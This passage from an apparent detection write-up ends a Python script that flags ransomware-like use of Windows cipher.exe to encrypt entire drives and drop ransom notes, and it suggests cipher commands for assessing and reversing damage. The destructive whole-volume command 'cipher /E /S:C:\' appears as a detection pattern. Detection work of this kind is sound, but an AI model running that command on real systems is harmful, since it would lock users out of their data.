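def severity(f: Finding) -> str:
    """Whole-volume scope (cipher /E /S:C:\\) is the high-severity variant."""
    return "high" if f.hit_drive_root else "medium"


if __name__ == "__main__":
    for ppid, f in analyze(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: severity={severity(f)} "
              f"cipher_scopes={f.cipher_scopes} notes={f.note_paths}")
```

On the constructed input only parent 1234 is reported, at "high" severity because of the C:\ and D:\ scopes; the admin-style cipher /E under parent 5555 is ignored because no note is dropped. On a live host, cipher /U /N lists every EFS-encrypted file on local drives without touching keys, which is the quickest way to size the damage before running cipher /D.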

                                                                                                                                                                                MITRE ATT&CK Enterprise v15
